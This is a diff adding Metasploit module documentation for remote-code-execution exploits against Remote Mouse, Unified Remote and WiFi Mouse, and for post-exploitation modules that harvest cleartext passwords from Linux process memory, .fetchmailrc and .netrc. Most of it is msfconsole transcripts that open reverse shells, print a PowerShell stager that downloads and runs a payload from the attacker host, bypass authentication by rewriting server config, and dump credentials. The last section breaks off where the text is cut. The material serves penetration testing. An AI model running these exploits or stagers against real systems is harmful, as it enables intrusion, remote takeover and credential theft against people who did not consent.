+[*] 192.168.2.95:1978 - Connecting
+[*] 192.168.2.95:1978 - Sending Windows key
+[*] 192.168.2.95:1978 - Opening command prompt
+[*] 192.168.2.95:1978 - Sending stager
+[*] 192.168.2.95:1978 - Using URL: http://192.168.2.199:8080/
+[+] 192.168.2.95:1978 - Payload request received, sending 73802 bytes of payload for staging
+[+] 192.168.2.95:1978 - Payload request received, sending 73802 bytes of payload for staging
+[*] 192.168.2.95:1978 - Executing payload
+[*] Encoded stage with x86/shikata_ga_nai
+[*] Sending encoded stage (267 bytes) to 192.168.2.95
+[*] Command shell session 1 opened (192.168.2.199:4444 -> 192.168.2.95:49962) at 2022-09-27 16:33:02 -0400
+[*] 192.168.2.95:1978 - Server stopped.
+[!] 192.168.2.95:1978 - This exploit may require manual cleanup of 'c:\Windows\Temp\NADYvmtxr.exe' on the target
+
+
+Shell Banner:
+Microsoft Windows [Version 10.0.16299.125]
+-----
+          
+
+C:\Users\windows>whoami 
+whoami
+win10prolicense\windows
+
+C:\Users\windows>systeminfo
+systeminfo
+
+Host Name:                 WIN10PROLICENSE
+OS Name:                   Microsoft Windows 10 Pro
+OS Version:                10.0.16299 N/A Build 16299
+```
+
+###  Remote Mouse 4.110 on Windows 10, with a password
+
+
+```
+resource (remote_mouse.rb)> use exploits/windows/misc/remote_mouse_rce
+[*] Using configured payload windows/shell/reverse_tcp
+resource (remote_mouse.rb)> set rhosts 192.168.2.95
+rhosts => 192.168.2.95
+resource (remote_mouse.rb)> set lhost 192.168.2.199
+lhost => 192.168.2.199
+resource (remote_mouse.rb)> set verbose true
+verbose => true
+msf6 exploit(windows/misc/remote_mouse_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.2.199:4444 
+[*] 192.168.2.95:1978 - Running automatic check ("set AutoCheck false" to disable)
+[+] 192.168.2.95:1978 - The target appears to be vulnerable. Received handshake with version: 411
+[*] 192.168.2.95:1978 - Connecting
+[*] 192.168.2.95:1978 - Sending Windows key
+[*] 192.168.2.95:1978 - Opening command prompt
+[*] 192.168.2.95:1978 - Sending stager
+[*] 192.168.2.95:1978 - Using URL: http://192.168.2.199:8080/
+[+] 192.168.2.95:1978 - Payload request received, sending 73802 bytes of payload for staging
+[+] 192.168.2.95:1978 - Payload request received, sending 73802 bytes of payload for staging
+[*] 192.168.2.95:1978 - Executing payload
+[*] Encoded stage with x86/shikata_ga_nai
+[*] Sending encoded stage (267 bytes) to 192.168.2.95
+[*] Command shell session 1 opened (192.168.2.199:4444 -> 192.168.2.95:49975) at 2022-09-27 16:36:09 -0400
+[*] 192.168.2.95:1978 - Server stopped.
+[!] 192.168.2.95:1978 - This exploit may require manual cleanup of 'c:\Windows\Temp\86a4GsbpomvEgUS.exe' on the target
+
+
+Shell Banner:
+Microsoft Windows [Version 10.0.16299.125]
+-----
+          
+
+C:\Users\windows>
+```
@@ -0,0 +1,313 @@
+## Vulnerable Application
+
+This module utilizes the Unified Remote remote control protocol to type out and
+deploy a payload.  The remote control protocol can be configured to have no passwords,
+a group password, or individual user accounts.  If the web page is accessible, the
+access control is set to no password for exploitation, then reverted.
+If the web page is not accessible, exploitation will be tried blindly.
+
+This module has been successfully tested against version 3.11.0.2483 (50) on Windows 10.
+
+Version 3.11.0.2483 can be downloaded from
+[unifiedremote.com](https://www.unifiedremote.com/static/builds/server/windows-x86/2483/ServerSetup-3.11.0.2483.exe)
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use exploit/windows/misc/unified_remote_rce`
+4. Set `rhost` and `lhost` as required.
+5. Do: `run`
+6. You should get a shell.
+
+## Options
+
+
+### WEBSERVER
+
+The port the web server is running on.  Defaults to `9510`
+
+### CLIENTNAME
+
+The name of the client device to use.  This shows up in the Unified Remote logs. If empty
+A random android based name is chosen. Defaults to ``
+
+### SLEEP
+
+The length of time to sleep between each command, this gives the remote program time to process the command on screen.
+Defaults to `1` second.
+
+### PATH
+
+This ONLY applies to the pull method.  Where to temporarily store the payload.  Defaults to `c:\\Windows\\Temp\\`
+
+### VISIBLE
+
+If set to `true`, uses a 'standard' method of typing to the screen. If set to `false`
+utilizes a 'pro' feature of unified remote to execute a script in the background.
+Defaults to `false`
+
+## Scenarios
+
+### Version 3.11.0.2483 on Windows 10, No authentication, visible false
+
+```
+resource (unified.rb)> use exploits/windows/misc/unified_remote_rce
+[*] Using configured payload windows/shell/reverse_tcp
+resource (unified.rb)> set rhosts 2.2.2.2
+rhosts => 2.2.2.2
+resource (unified.rb)> set lhost 1.1.1.1
+lhost => 1.1.1.1
+resource (unified.rb)> set verbose true
+verbose => true
+msf6 exploit(windows/misc/unified_remote_rce) > run
+
+[*] Started reverse TCP handler on 1.1.1.1:4444 
+[*] 2.2.2.2:9512 - Client name set to: android-ASvxWyO708Rv4x0j
+[*] 2.2.2.2:9512 - Retrieving server config
+[+] 2.2.2.2:9512 - No security enabled
+[+] 2.2.2.2:9512 - Found account: admin
+[+] 2.2.2.2:9512 - Found account: wheres
+[*] 2.2.2.2:9512 - Sending handshake
+[*] 2.2.2.2:9512 - Sending empty authentication
+[*] 2.2.2.2:9512 - Using URL: http://1.1.1.1:8080/
+[*] 2.2.2.2:9512 - Loading Unified.Command
+[*] 2.2.2.2:9512 - Updating Unified.Command
+[*] 2.2.2.2:9512 - Sending payload
+[*] 2.2.2.2:9512 - Executing script
+[+] 2.2.2.2:9512 - Payload request received, sending 73802 bytes of payload for staging
+[+] 2.2.2.2:9512 - Payload request received, sending 73802 bytes of payload for staging
+[*] Encoded stage with x86/shikata_ga_nai
+[*] Sending encoded stage (267 bytes) to 2.2.2.2
+[*] Command shell session 1 opened (1.1.1.1:4444 -> 2.2.2.2:50052) at 2022-09-18 19:00:33 -0400
+[*] 2.2.2.2:9512 - Server stopped.
+[!] 2.2.2.2:9512 - This exploit may require manual cleanup of 'c:\Windows\Temp\U4culUYTuG.exe' on the target
+
+
+Shell Banner:
+Microsoft Windows [Version 10.0.16299.125]
+-----
+          
+
+C:\ProgramData\Unified Remote\Remotes\Bundled\Unified\Main\Command>
+```
+
+### Version 3.11.0.2483 on Windows 10, No authentication, visible true
+
+```
+resource (unified.rb)> use exploits/windows/misc/unified_remote_rce
+[*] Using configured payload windows/shell/reverse_tcp
+resource (unified.rb)> set rhosts 2.2.2.2
+rhosts => 2.2.2.2
+resource (unified.rb)> set lhost 1.1.1.1
+lhost => 1.1.1.1
+resource (unified.rb)> set verbose true
+verbose => true
+msf6 exploit(windows/misc/unified_remote_rce) > exploit
+
+[*] Started reverse TCP handler on 1.1.1.1:4444 
+[*] 2.2.2.2:9512 - Client name set to: android-s5IbpVuRf1MJzqRs
+[*] 2.2.2.2:9512 - Retrieving server config
+[+] 2.2.2.2:9512 - No security enabled
+[+] 2.2.2.2:9512 - Found account: admin
+[+] 2.2.2.2:9512 - Found account: wheres
+[*] 2.2.2.2:9512 - Sending handshake
+[*] 2.2.2.2:9512 - Sending empty authentication
+[*] 2.2.2.2:9512 - Opening Start Menu
+[*] 2.2.2.2:9512 - Opening command prompt
+[*] 2.2.2.2:9512 - Typing out payload
+[*] 2.2.2.2:9512 - Using URL: http://1.1.1.1:8080/
+[*] 2.2.2.2:9512 - Attempting to open payload
+[+] 2.2.2.2:9512 - Payload request received, sending 73802 bytes of payload for staging
+[+] 2.2.2.2:9512 - Payload request received, sending 73802 bytes of payload for staging
+[*] Encoded stage with x86/shikata_ga_nai
+[*] Sending encoded stage (267 bytes) to 2.2.2.2
+[*] Command shell session 1 opened (1.1.1.1:4444 -> 2.2.2.2:59233) at 2022-09-08 16:47:20 -0400
+[*] 2.2.2.2:9512 - Server stopped.
+[!] 2.2.2.2:9512 - This exploit may require manual cleanup of 'c:\Windows\Temp\jhy5cTqRs.exe' on the target
+
+
+Shell Banner:
+Microsoft Windows [Version 10.0.16299.125]
+-----
+          
+
+C:\Users\windows>whoami
+whoami
+win10prolicense\windows
+
+C:\Users\windows>systeminfo
+systeminfo
+
+Host Name:                 WIN10PROLICENSE
+OS Name:                   Microsoft Windows 10 Pro
+OS Version:                10.0.16299 N/A Build 16299
+```
+
+### Version 3.11.0.2483 on Windows 10, group authentication, visible true
+
+```
+resource (unified.rb)> use exploits/windows/misc/unified_remote_rce
+[*] Using configured payload windows/shell/reverse_tcp
+resource (unified.rb)> set rhosts 2.2.2.2
+rhosts => 2.2.2.2
+resource (unified.rb)> set lhost 1.1.1.1
+lhost => 1.1.1.1
+resource (unified.rb)> set verbose true
+verbose => true
+msf6 exploit(windows/misc/unified_remote_rce) > exploit
+
+[*] Started reverse TCP handler on 1.1.1.1:4444 
+[*] 2.2.2.2:9512 - Client name set to: android-ergZhp49nDBmGXz8
+[*] 2.2.2.2:9512 - Retrieving server config
+[*] 2.2.2.2:9512 - anonymous mode enabled, password required, bypassing
+[*] 2.2.2.2:9512 - Uploading new server config
+[*] 2.2.2.2:9512 - Sleeping 5 seconds for server to restart
+[+] 2.2.2.2:9512 - Found account: admin
+[+] 2.2.2.2:9512 - Found account: wheres
+[*] 2.2.2.2:9512 - Sending handshake
+[*] 2.2.2.2:9512 - Sending empty authentication
+[*] 2.2.2.2:9512 - Opening Start Menu
+[*] 2.2.2.2:9512 - Opening command prompt
+[*] 2.2.2.2:9512 - Typing out payload
+[*] 2.2.2.2:9512 - Using URL: http://1.1.1.1:8080/
+[*] 2.2.2.2:9512 - Attempting to open payload
+[+] 2.2.2.2:9512 - Payload request received, sending 73802 bytes of payload for staging
+[+] 2.2.2.2:9512 - Payload request received, sending 73802 bytes of payload for staging
+[*] Encoded stage with x86/shikata_ga_nai
+[*] Sending encoded stage (267 bytes) to 2.2.2.2
+[*] 2.2.2.2:9512 - Reverting security mode
+[*] 2.2.2.2:9512 - Uploading new server config
+[*] 2.2.2.2:9512 - Sleeping 5 seconds for server to restart
+[*] Command shell session 1 opened (1.1.1.1:4444 -> 2.2.2.2:59596) at 2022-09-08 16:50:21 -0400
+[*] 2.2.2.2:9512 - Server stopped.
+[!] 2.2.2.2:9512 - This exploit may require manual cleanup of 'c:\Windows\Temp\lqVUQTKtxuSD1mm.exe' on the target
+
+
+Shell Banner:
+Microsoft Windows [Version 10.0.16299.125]
+-----
+          
+
+C:\Users\windows>
+```
+
+### Version 3.11.0.2483 on Windows 10, user authentication, visible true
+
+```
+resource (unified.rb)> use exploits/windows/misc/unified_remote_rce
+[*] Using configured payload windows/shell/reverse_tcp
+resource (unified.rb)> set rhosts 2.2.2.2
+rhosts => 2.2.2.2
+resource (unified.rb)> set lhost 1.1.1.1
+lhost => 1.1.1.1
+resource (unified.rb)> set verbose true
+verbose => true
+msf6 exploit(windows/misc/unified_remote_rce) > exploit
+
+[*] Started reverse TCP handler on 1.1.1.1:4444 
+[*] 2.2.2.2:9512 - Client name set to: android-Mmw9X2FSLLPzJk6t
+[*] 2.2.2.2:9512 - Retrieving server config
+[*] 2.2.2.2:9512 - users mode enabled, password required, bypassing
+[*] 2.2.2.2:9512 - Uploading new server config
+[*] 2.2.2.2:9512 - Sleeping 5 seconds for server to restart
+[+] 2.2.2.2:9512 - Found account: admin
+[+] 2.2.2.2:9512 - Found account: wheres
+[*] 2.2.2.2:9512 - Sending handshake
+[*] 2.2.2.2:9512 - Sending empty authentication
+[*] 2.2.2.2:9512 - Opening Start Menu
+[*] 2.2.2.2:9512 - Opening command prompt
+[*] 2.2.2.2:9512 - Typing out payload
+[*] 2.2.2.2:9512 - Using URL: http://1.1.1.1:8080/
+[*] 2.2.2.2:9512 - Attempting to open payload
+[+] 2.2.2.2:9512 - Payload request received, sending 73802 bytes of payload for staging
+[+] 2.2.2.2:9512 - Payload request received, sending 73802 bytes of payload for staging
+[*] Encoded stage with x86/shikata_ga_nai
+[*] Sending encoded stage (267 bytes) to 2.2.2.2
+[*] 2.2.2.2:9512 - Reverting security mode
+[*] 2.2.2.2:9512 - Uploading new server config
+[*] 2.2.2.2:9512 - Sleeping 5 seconds for server to restart
+[*] Command shell session 1 opened (1.1.1.1:4444 -> 2.2.2.2:59932) at 2022-09-08 16:53:05 -0400
+[*] 2.2.2.2:9512 - Server stopped.
+[!] 2.2.2.2:9512 - This exploit may require manual cleanup of 'c:\Windows\Temp\2NzuxPbY6fGK9FdNy.exe' on the target
+
+
+Shell Banner:
+Microsoft Windows [Version 10.0.16299.125]
+-----
+          
+
+C:\Users\windows>
+```
+
+### Version 3.11.0.2483 on Windows 10, no authentication, no web server access, visible true
+
+```
+resource (unified.rb)> use exploits/windows/misc/unified_remote_rce
+[*] Using configured payload windows/shell/reverse_tcp
+resource (unified.rb)> set rhosts 2.2.2.2
+rhosts => 2.2.2.2
+resource (unified.rb)> set lhost 1.1.1.1
+lhost => 1.1.1.1
+resource (unified.rb)> set verbose true
+verbose => true
+msf6 exploit(windows/misc/unified_remote_rce) > exploit
+
+[*] Started reverse TCP handler on 1.1.1.1:4444 
+[*] 2.2.2.2:9512 - Client name set to: android-EIC1Bc3pwL4U4Pnj
+[*] 2.2.2.2:9512 - Retrieving server config
+[-] 2.2.2.2:9512 - Web interface is disabled. Unable to attempt bypass, assuming no authentication.
+[*] 2.2.2.2:9512 - Sending handshake
+[*] 2.2.2.2:9512 - Sending empty authentication
+[*] 2.2.2.2:9512 - Opening Start Menu
+[*] 2.2.2.2:9512 - Opening command prompt
+[*] 2.2.2.2:9512 - Typing out payload
+[*] 2.2.2.2:9512 - Using URL: http://1.1.1.1:8080/
+[*] 2.2.2.2:9512 - Attempting to open payload
+[+] 2.2.2.2:9512 - Payload request received, sending 73802 bytes of payload for staging
+[+] 2.2.2.2:9512 - Payload request received, sending 73802 bytes of payload for staging
+[*] Encoded stage with x86/shikata_ga_nai
+[*] Sending encoded stage (267 bytes) to 2.2.2.2
+[*] Command shell session 1 opened (1.1.1.1:4444 -> 2.2.2.2:60829) at 2022-09-08 17:00:30 -0400
+[*] 2.2.2.2:9512 - Server stopped.
+[!] 2.2.2.2:9512 - This exploit may require manual cleanup of 'c:\Windows\Temp\QD7V9rLaWUwvPIY.exe' on the target
+
+
+Shell Banner:
+Microsoft Windows [Version 10.0.16299.125]
+-----
+          
+
+C:\Users\windows>
+```
+
+### Version 3.11.0.2483 on Windows 10, user authentication, no web server access, visible true
+
+This will fail.
+
+```
+resource (unified.rb)> use exploits/windows/misc/unified_remote_rce
+[*] Using configured payload windows/shell/reverse_tcp
+resource (unified.rb)> set rhosts 2.2.2.2
+rhosts => 2.2.2.2
+resource (unified.rb)> set lhost 1.1.1.1
+lhost => 1.1.1.1
+resource (unified.rb)> set verbose true
+verbose => true
+msf6 exploit(windows/misc/unified_remote_rce) > exploit
+
+[*] Started reverse TCP handler on 1.1.1.1:4444 
+[*] 2.2.2.2:9512 - Client name set to: android-iJP3rW13dKjtf8Xz
+[*] 2.2.2.2:9512 - Retrieving server config
+[-] 2.2.2.2:9512 - Web interface is disabled. Unable to attempt bypass, assuming no authentication.
+[*] 2.2.2.2:9512 - Sending handshake
+[*] 2.2.2.2:9512 - Sending empty authentication
+[*] 2.2.2.2:9512 - Opening Start Menu
+[*] 2.2.2.2:9512 - Opening command prompt
+[*] 2.2.2.2:9512 - Typing out payload
+[*] 2.2.2.2:9512 - Using URL: http://1.1.1.1:8080/
+[*] 2.2.2.2:9512 - Attempting to open payload
+[*] 2.2.2.2:9512 - Server stopped.
+[!] 2.2.2.2:9512 - This exploit may require manual cleanup of 'c:\Windows\Temp\tapEZnGskY.exe' on the target
+[*] Exploit completed, but no session was created.
+```
@@ -0,0 +1,143 @@
+## Vulnerable Application
+
+The WiFi Mouse (Mouse Server) from Necta LLC contains an auth bypass as the
+authentication is implemented entirely on the client side. By utilizing this
+vulnerability, it is possible to open a program on the server (cmd.exe
+in our case) and type commands resulting in an RCE.
+
+Versions 1.8.3.4 (current as of module writing) and before are vulnerable.
+
+Version 1.8.3.4 can be downloaded from https://wifimouse.necta.us/apk/MouseServer.exe
+at the time of writing.
+
+Version 1.8.3.0 can be downloaded from https://wifimouse.necta.us/apk/MouseServer1.8.3.0.exe
+
+Version 1.8.2.3 can be downloaded from [edb](https://www.exploit-db.com/apps/46b494c56615f48dd09065108d604762-MouseServer.exe) or from https://wifimouse.necta.us/apk/MouseServer1.8.2.3.exe
+
+Version 1.7.8.5 can be downloaded from https://wifimouse.necta.us/apk/MouseServerLatest.exe
+## Targets
+
+### Stager
+
+This is Metasploit's cmd stager, it has two flavors which can be changed through the advanced option
+`CMDSTAGER::FLAVOR`.
+
+1. `psh_invokewebrequest` (default) this one types the command and pulls back the payload nice and fast.
+You should use it in almost all circumstances.
+2. `certutil`  typing of the payload appears on the user's screen, and is thus unreliable
+(needs ~3.5min of solitude). If the user types anything or moves the focus to another window, exploit will fail.
+
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use exploit/windows/misc/wifi_mouse_rce`
+4. Set `rhost` and `lhost` as required.
+5. Do: `run`
+6. You should get a shell as the user who is running Wifi Mouse (Mouse Server).
+
+## Options
+
+### SLEEP
+
+The length of time, in seconds, to sleep between each command. This gives the remote program time to process the command on screen.
+
+### LINEMAX
+
+How long each line should be that is sent for processing. While the program
+seems to be able to take ~2048, anything more than ~1020 seems to crash the program. 1000 - 1020 should be safe.
+Defaults to `1020`.
+
+## Scenarios
+
+###  Wifi Mouse (Mouse Server) 1.8.3.4 on Windows 10 using `psh_invokewebrequest` Stager
+
+```
+resource (mouse.rb)> use exploits/windows/misc/wifi_mouse_rce
+[*] Using configured payload windows/shell/reverse_tcp
+resource (mouse.rb)> set lhost 1.1.1.1
+lhost => 1.1.1.1
+resource (mouse.rb)> set rhosts 2.2.2.2
+rhosts => 2.2.2.2
+resource (mouse.rb)> set verbose true
+verbose => true
+msf6 exploit(windows/misc/wifi_mouse_rce) > run
+
+[*] Started reverse TCP handler on 1.1.1.1:4444 
+[*] 2.2.2.2:1978 - Opening command prompt
+[*] 2.2.2.2:1978 - Typing out payload
+[*] 2.2.2.2:1978 - Using URL: http://1.1.1.1:8080/qGn4ESH
+[*] 2.2.2.2:1978 - Generated command stager: ["powershell.exe -c Invoke-WebRequest -OutFile %TEMP%\\IDcEhcbA.exe http://1.1.1.1:8080/qGn4ESH & %TEMP%\\IDcEhcbA.exe & del %TEMP%\\IDcEhcbA.exe"]
+[*] 2.2.2.2:1978 - Command Stager progress - 100.00% done (146/146 bytes)
+[*] 2.2.2.2:1978 - Client 2.2.2.2 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.16299.98) requested /qGn4ESH
+[*] 2.2.2.2:1978 - Sending payload to 2.2.2.2 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.16299.98)
+[*] Encoded stage with x86/shikata_ga_nai
+[*] Sending encoded stage (267 bytes) to 2.2.2.2
+[*] Command shell session 1 opened (1.1.1.1:4444 -> 2.2.2.2:50211) at 2022-09-21 16:29:06 -0400
+[*] 2.2.2.2:1978 - Server stopped.
+
+
+Shell Banner:
+Microsoft Windows [Version 10.0.16299.125]
+-----
+          
+
+C:\Windows\system32>whoami
+whoami
+win10prolicense\windows
+
+C:\Windows\system32>systeminfo
+systeminfo
+
+Host Name:                 WIN10PROLICENSE
+OS Name:                   Microsoft Windows 10 Pro
+OS Version:                10.0.16299 N/A Build 16299
+```
+
+### Wifi Mouse (Mouse Server) 1.8.2.3 on Windows 10 using `certutil` Stager
+
+```
+resource (mouse.rb)> use exploits/windows/misc/wifi_mouse_rce
+[*] Using configured payload windows/shell/reverse_tcp
+resource (mouse.rb)> set lhost 1.1.1.1
+lhost => 1.1.1.1
+resource (mouse.rb)> set rhosts 2.2.2.2
+rhosts => 2.2.2.2
+resource (mouse.rb)> set CMDSTAGER::FLAVOR certutil
+CMDSTAGER::FLAVOR => certutil
+msf6 exploit(windows/misc/wifi_mouse_rce) > set verbose false
+verbose => false
+msf6 exploit(windows/misc/wifi_mouse_rce) > run
+
+[*] Started reverse TCP handler on 1.1.1.1:4444 
+[*] 2.2.2.2:1978 - Opening command prompt
+[*] 2.2.2.2:1978 - Typing out payload
+[*] 2.2.2.2:1978 - Command Stager progress -   1.01% done (1019/100776 bytes)
+[*] 2.2.2.2:1978 - Command Stager progress -   2.02% done (2038/100776 bytes)
+[*] 2.2.2.2:1978 - Command Stager progress -   3.03% done (3057/100776 bytes)
+...
+[*] 2.2.2.2:1978 - Command Stager progress -  98.08% done (98843/100776 bytes)
+[*] 2.2.2.2:1978 - Command Stager progress -  99.09% done (99862/100776 bytes)
+[*] Encoded stage with x86/shikata_ga_nai
+[*] Sending encoded stage (267 bytes) to 2.2.2.2
+[*] 2.2.2.2:1978 - Command Stager progress - 100.00% done (100776/100776 bytes)
+[*] Command shell session 3 opened (1.1.1.1:4444 -> 2.2.2.2:50926) at 2022-09-04 15:11:29 -0400
+
+
+Shell Banner:
+Microsoft Windows [Version 10.0.16299.125]
+-----
+          
+
+C:\Program Files (x86)\MouseServer.exe>whoami
+whoami
+win10prolicense\windows
+
+C:\Program Files (x86)\MouseServer.exe>systeminfo
+systeminfo
+
+Host Name:                 WIN10PROLICENSE
+OS Name:                   Microsoft Windows 10 Pro
+OS Version:                10.0.16299 N/A Build 16299
+```
@@ -0,0 +1,192 @@
+## Vulnerable Application
+
+This finds cleartext passwords in process memory by first locating
+needles that are known to be found nearby. 
+
+This currently searches for passwords in `gnome-keyring-daemon`, `gdm-password`,
+`vsftpd`, `ssh`, and `lightdm`.
+
+## Verification Steps
+
+1. Get a meterpreter session on a Linux-based target (with root privileges)
+2. Do: `use post/linux/gather/mimipenguin`
+3. Do: `set session <sess_no>`
+4. Do: `run`
+5. You should get credentials for the vulnerable services installed
+
+## Options
+
+## Scenarios
+
+### Ubuntu 22.04 x64
+
+```
+msf6 exploit(multi/handler) > run
+
+[*] Started reverse TCP handler on 192.168.140.1:4444
+[*] Sending stage (3020772 bytes) to 192.168.140.140
+[*] Meterpreter session 1 opened (192.168.140.1:4444 -> 192.168.140.140:35100 ) at 2022-06-22 13:11:24 -0500
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer     : 192.168.140.140
+OS           : Ubuntu 22.04 (Linux 5.15.0-37-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > background
+[*] Backgrounding session 1...
+msf6 exploit(multi/handler) > use post/linux/gather/mimipenguin
+msf6 post(linux/gather/mimipenguin) > set session 1
+session => 1
+msf6 post(linux/gather/mimipenguin) > run
+
+[!] SESSION may not be compatible with this module:
+[!]  * missing Meterpreter features: stdapi_railgun_api
+[*] Checking for matches in process gnome-keyring-daemon
+[*] Checking for matches in process gdm-password
+[*] Checking for matches in process vsftpd
+[*] Checking for matches in process sshd
+[*] Checking for matches in process lightdm
+[+] Found 1 valid credential(s)!
+
+Credentials
+===========
+
+  Process Name          Username     Password
+  ------------          --------     --------
+  gnome-keyring-daemon  mimipenguin  M!mipenguinPass
+
+[*] Credentials stored in /home/space/.msf4/loot/20220622131237_default_192.168.140.140_mimipenguin.csv_806145.txt
+[*] Post module execution completed
+```
+
+### Ubuntu 21.04 x64
+
+```
+msf6 exploit(multi/handler) > run
+
+[*] Started reverse TCP handler on 192.168.140.1:4444
+[*] Sending stage (3020772 bytes) to 192.168.140.131
+[*] Meterpreter session 2 opened (192.168.140.1:4444 -> 192.168.140.131:57524 ) at 2022-06-22 13:17:35 -0500
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer     : 192.168.140.131
+OS           : Ubuntu 21.04 (Linux 5.11.0-49-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > background
+[*] Backgrounding session 2...
+msf6 exploit(multi/handler) > previous
+msf6 post(linux/gather/mimipenguin) > set session 2
+session => 2
+msf6 post(linux/gather/mimipenguin) > run
+
+[!] SESSION may not be compatible with this module:
+[!]  * missing Meterpreter features: stdapi_railgun_api
+[*] Checking for matches in process gnome-keyring-daemon
+[*] Checking for matches in process gdm-password
+[*] Checking for matches in process vsftpd
+[*] Checking for matches in process sshd
+[*] Checking for matches in process lightdm
+[+] Found 2 valid credential(s)!
+
+Credentials
+===========
+
+  Process Name          Username  Password
+  ------------          --------  --------
+  gnome-keyring-daemon  space     password
+  vsftpd                jdoe      AccountF0rFTP
+
+[*] Credentials stored in /home/space/.msf4/loot/20220622131938_default_192.168.140.131_mimipenguin.csv_269764.txt
+[*] Post module execution completed
+```
+
+### Fedora 27 x64
+
+```
+msf6 exploit(multi/handler) > run
+
+[*] Started reverse TCP handler on 192.168.140.1:4444
+[*] Sending stage (3020772 bytes) to 192.168.140.165
+[*] Meterpreter session 3 opened (192.168.140.1:4444 -> 192.168.140.165:39180 ) at 2022-06-22 13:23:26 -0500
+
+meterpreter > background
+[*] Backgrounding session 3...
+msf6 exploit(multi/handler) > previous
+msf6 post(linux/gather/mimipenguin) > set session 3
+session => 3
+msf6 post(linux/gather/mimipenguin) > run
+
+[!] SESSION may not be compatible with this module:
+[!]  * missing Meterpreter features: stdapi_railgun_api
+[*] Checking for matches in process gnome-keyring-daemon
+[*] Checking for matches in process gdm-password
+[*] Checking for matches in process vsftpd
+[*] Checking for matches in process sshd
+[*] Checking for matches in process lightdm
+[+] Found 2 valid credential(s)!
+
+Credentials
+===========
+
+  Process Name          Username     Password
+  ------------          --------     --------
+  gnome-keyring-daemon  mimipenguin  M!mipenguinPass
+  vsftpd                ftp_user     FTPP@ssword
+
+[*] Credentials stored in /home/space/.msf4/loot/20220622132521_default_192.168.140.165_mimipenguin.csv_330546.txt
+[*] Post module execution completed
+```
+
+### Ubuntu 14.04.1 x86
+
+```
+msf6 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
+payload => linux/x86/meterpreter/reverse_tcp
+msf6 exploit(multi/handler) > run
+
+[*] Started reverse TCP handler on 192.168.140.1:4444
+[*] Sending stage (989032 bytes) to 192.168.140.135
+[*] Meterpreter session 4 opened (192.168.140.1:4444 -> 192.168.140.135:37070 ) at 2022-06-22 13:34:19 -0500
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer     : 192.168.140.135
+OS           : Ubuntu 14.04 (Linux 4.4.0-142-generic)
+Architecture : i686
+BuildTuple   : i486-linux-musl
+Meterpreter  : x86/linux
+meterpreter > background
+[*] Backgrounding session 4...
+msf6 exploit(multi/handler) > previous
+msf6 post(linux/gather/mimipenguin) > set session 4
+session => 4
+msf6 post(linux/gather/mimipenguin) > run
+
+[!] SESSION may not be compatible with this module:
+[!]  * missing Meterpreter features: stdapi_railgun_api
+[*] Checking for matches in process gnome-keyring-daemon
+[*] Checking for matches in process gdm-password
+[*] Checking for matches in process vsftpd
+[*] Checking for matches in process sshd
+[*] Checking for matches in process lightdm
+[+] Found 2 valid credential(s)!
+
+Credentials
+===========
+
+  Process Name          Username  Password
+  ------------          --------  --------
+  gnome-keyring-daemon  space     password
+  gnome-keyring-daemon  test      RunningUpThatH!ll
+
+[*] Credentials stored in /Users/space/.msf4/loot/20220622133502_default_192.168.140.135_mimipenguin.csv_117775.txt
+[*] Post module execution completed
+```
@@ -0,0 +1,59 @@
+## Vulnerable Application
+
+Post module to obtain credentials saved for IMAP, POP and other mail
+retrieval protocols in fetchmail's `.fetchmailrc`.
+
+This file is kept in user's home directories to configure fetchmail,
+but contains cleartext credentials.
+
+### Example fetchmailrc file
+
+Example documentation can be found in the fetchmail handbook:
+https://docs.freebsd.org/doc/6.0-RELEASE/usr/share/doc/handbook/mail-fetchmail.html#:~:text=fetchmailrc%20serves%20as%20an%20example,user%20on%20the%20local%20system.
+
+```
+echo "poll example.com protocol pop3 username \"joesoap\" password \"XXX\"" > ~/.fetchmailrc
+```
+
+## Verification Steps
+
+1. Start msfconsole
+1. Get a shell on a system
+1. Do: `use post/multi/gather/fetchmailrc_creds`
+1. Do: `set session [session]`
+1. Do: `run`
+1. If any `.fetchmailrc` files exist with credentials, they will be read and stored into a loot file.
+
+## Options
+
+## Scenarios
+
+### Ubuntu 22.04.01
+
+```
+msf6 auxiliary(scanner/ssh/ssh_login) > sessions -l
+
+Active sessions
+===============
+
+  Id  Name  Type         Information   Connection
+  --  ----  ----         -----------   ----------
+  1         shell linux  SSH ubuntu @  2.2.2.2:39857 -> 1.1.1.1:22 (1.1.1.1)
+
+msf6 auxiliary(scanner/ssh/ssh_login) > use post/multi/gather/fetchmailrc_creds
+msf6 post(multi/gather/fetchmailrc_creds) > set session 1
+session => 1
+msf6 post(multi/gather/fetchmailrc_creds) > run
+
+[*] Parsing /home/ubuntu/.fetchmailrc
+                
+.fetchmailrc credentials
+========================
+
+ Username  Password  Server       Protocol  Port
+ --------  --------  ------       --------  ----
+ joesoap   XXX       example.com  pop3
+
+[*] Credentials stored in: /root/.msf4/loot/20221008102916_default_1.1.1.1_fetchmailrc.cred_476989.txt
+[*] Post module execution completed
+```
@@ -0,0 +1,88 @@
+## Vulnerable Application
+
+Post module to obtain credentials saved for FTP and other services
+in `.netrc`
+
+This file is kept in user's home directories to configure various services,
+such as curl, but contains cleartext credentials.
+
+### Example netrc file
+
+Example documentation can be found in the curl docs on netrc:
+https://everything.curl.dev/usingcurl/netrc
+
+```
+echo "machine example.com login daniel password qwerty" > ~/.netrc
+echo "machine example2.com" >> ~/.netrc
+echo "login daniel2" >> ~/.netrc
+echo "password qwerty2" >> ~/.netrc
+```
+
+## Verification Steps
+
+1. Start msfconsole
+1. Get a shell on a system
+1. Do: `use post/multi/gather/netrc_creds`
+1. Do: `set session [session]`
+1. Do: `run`
+1. If any `.netrc` files exist with credentials, they will be read and stored into a loot file.
+
+## Options
+
+## Scenarios
+
+### Ubuntu 22.04.01
+
+```
